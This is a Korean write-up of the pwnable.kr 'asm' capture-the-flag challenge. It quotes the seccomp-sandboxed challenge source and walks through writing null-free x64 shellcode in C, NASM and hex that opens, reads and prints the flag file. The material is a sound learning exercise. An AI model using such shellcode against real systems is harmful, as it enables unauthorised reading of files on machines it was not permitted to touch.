asm (6points)

그림1. pwnable.kr asm 설명화면

해당 문제를 확인해본 결과

쉘코드를 만드는 문제로 예상된다.

 

해당 문제에 접속해보자.

 

그림2. 디렉토리 목록

 

해당 디렉토리를 확인해본 결과

문제 바이너리와 소스코드, readme, 플래그 파일이 주어져있다.

 

readme 파일을 확인해본 결과

once you connect to port 9026, the "asm" binary will be executed under asm_pwn privilege.
make connection to challenge (nc 0 9026) then get the flag. (file name of the flag is same as the one in this directory)

다음과 같은 설명이 주어져있다.

실제 문제를 풀기 위해서는 포트 9026으로 접속하면 될 것으로 확인된다.

 

주어진 바이너리의 소스코드를 확인해보겠다.

 

#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h> #define LENGTH 128 void sandbox(){ scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); if (ctx == NULL) { printf("seccomp error\n"); exit(0); } seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); if (seccomp_load(ctx) < 0){ seccomp_release(ctx); printf("seccomp error\n"); exit(0); } seccomp_release(ctx); } char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff"; unsigned char filter[256]; int main(int argc, char* argv[]){ setvbuf(stdout, 0, _IONBF, 0); setvbuf(stdin, 0, _IOLBF, 0); printf("Welcome to shellcoding practice challenge.\n"); printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n"); printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n"); printf("If this does not challenge you. you should play 'asg' challenge :)\n"); char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0); memset(sh, 0x90, 0x1000); memcpy(sh, stub, strlen(stub)); int offset = sizeof(stub); printf("give me your x64 shellcode: "); read(0, sh+offset, 1000); alarm(10); chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmp sandbox(); ((void (*)(void))sh)(); return 0; }

소스코드를 확인해본 결과

64bit 기반의 shellcode를 입력하여 플래그를 획득하는 것으로 확인되는 데, sandbox가 걸려있다.

sandbox 조건에 따르면 open()/read()/write() 함수만을 이용할 수 있는 것으로 확인된다.

 

 

또한 주어진 stub코드에서는 모든 레지스터를 초기화 시키는 것으로 확인된다.

그러므로 이후부터는 syscall을 이용하여 open → read → write 순으로 호출하여 플래그를 획득하면 된다.

 

문제해결을 위해 실제 로직을 작성해보자.

 

#include <stdio.h> // puts() #include <string.h> // strlen() #include <fcntl.h> // O_WRONLY #include <unistd.h> // write(), close() #define BUFF_SIZE 1024 int main() { const char *filename = "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"; int fd; char buff[BUFF_SIZE]; fd = open(filename, O_RDONLY); read(fd, buff, BUFF_SIZE); write(1, buff, BUFF_SIZE); // 표준출력 stdout(1)을 통한 출력 close(fd); return 0; }

 

 

해당 소스코드를 컴파일[gcc -o syscall_practice syscall_practice.c]해서 실행시켜 본 결과

다음과 같이 정상적으로 플래그 파일을 읽어서 화면에 출력하는 것을 확인할 수 있다.

 

해당 문제를 간단히 풀기 위해서는 pwntool이라 shellcraft를 이용하면 되지만 문제의도에 충실하게 하기 위해서

실제로 어셈블리 프로그래밍을 진행해서 풀어보겠다.

 

어셈블리 프로그래밍을 진행하기전에 필요한 syscall은 open, read, write이며 해당 테이블을 첨부해두겠다.

 

 

section .data msg db "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong" section .bss buffer: resb 1024 section .text global_start _start mov rax, 2 mov rdi, msg xor rsi, rsi mov rdx, rsi syscall mov rdi, rax mov rax, 0 mov rsi, buffer mov rdx, 1024 syscall mov rax, 1 mov rdi, 1 mov rsi, buffer mov rdx, 1024 syscall mov rax, 60 mov rdi, 0 syscall

 

 

다음과 같이 nasm을 이용하여 해당 소스코드를 컴파일 해본결과

정상적으로 open → read → write 함수를 통해 다음과 같이 정상적으로 syscall을 호출하며 파일의 내용을 화면에

출력하는 것으로 확인된다.

 

 

objdump를 이용하여 확인해본 결과 다음과 같은 바이트 코드들을 확인할 수 있다.

로컬에서는 정상적으로 구동되지만 실제 플래그를 얻어내기 위해서는 유의할 점이 있다.

1. \x00에 해당하는 null값들이 바이트 코드에 포함되어 있다.

2. 읽을 파일의 이름을 직접 구성해줘야 한다.

3. buffer의 주소를 지정해줘야 한다.

 

이를 적용한 어셈블리 코드를 재작성해보겠다.

 

section .data msg db "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong" section .bss buffer: resb 1024 section .text global_start _start xor rax, rax mov rax, 0x676e6f306f306f push rax mov rax, 0x306f306f306f306f push rax mov rax, 0x3030303030303030 push rax mov rax, 0x303030306f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f3030303030 push rax mov rax, 0x3030303030303030 push rax mov rax, 0x3030303030303030 push rax mov rax, 0x303030306f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6c5f797265765f73 push rax mov rax, 0x695f656d616e5f65 push rax mov rax, 0x6c69665f6568745f push rax mov rax, 0x7972726f732e656c push rax mov rax, 0x69665f736968745f push rax mov rax, 0x646165725f657361 push rax mov rax, 0x656c705f656c6966 push rax mov rax, 0x5f67616c665f726b push rax mov rax, 0x2e656c62616e7770 push rax mov rax, 0x5f73695f73696874 push rax xor rax, rax inc rax inc rax mov rdi, rsp xor rsi, rsi mov rdx, rsi syscall mov rdi, rax xor rax, rax mov rsi, 0x41414840 mov dx, 1000 syscall xor rax, rax inc rax xor rdi, rdi inc rdi mov rsi, 0x41414840 mov dx, 1000 syscall

 

buffer의 주소는 임의로 지정해주었으며 이제 이를 통해 바이트 코드를 추출해보자.

 

 

다음과 같은 쉘코드를 얻을 수 있다.

"\x48\x31\xc0\x48\xb8\x6f\x30\x6f\x30\x6f\x6e\x67\x00\x50\x48\xb8\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x30\x30\x30\x30\x30\x6f\x6f\x6f\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x73\x5f\x76\x65\x72\x79\x5f\x6c\x50\x48\xb8\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x50\x48\xb8\x5f\x74\x68\x65\x5f\x66\x69\x6c\x50\x48\xb8\x6c\x65\x2e\x73\x6f\x72\x72\x79\x50\x48\xb8\x5f\x74\x68\x69\x73\x5f\x66\x69\x50\x48\xb8\x61\x73\x65\x5f\x72\x65\x61\x64\x50\x48\xb8\x66\x69\x6c\x65\x5f\x70\x6c\x65\x50\x48\xb8\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x50\x48\xb8\x70\x77\x6e\x61\x62\x6c\x65\x2e\x50\x48\xb8\x74\x68\x69\x73\x5f\x69\x73\x5f\x50\x48\x31\xc0\x48\xff\xc0\x48\xff\xc0\x48\x89\xe7\x48\x31\xf6\x48\x89\xf2\x0f\x05\x48\x89\xc7\x48\x31\xc0\xbe\x40\x48\x41\x41\x66\xba\xe8\x03\x0f\x05\x48\x31\xc0\x48\xff\xc0\x48\x31\xff\x48\xff\xc7\xbe\x40\x48\x41\x41\x66\xba\xe8\x03\x0f\x05\x00"

 

실제로 pwnable.kr 서버에 접속하여 다음과 같은 페이로드를 전송 시

 

 

정상적으로 플래그를 획득할 수 있다.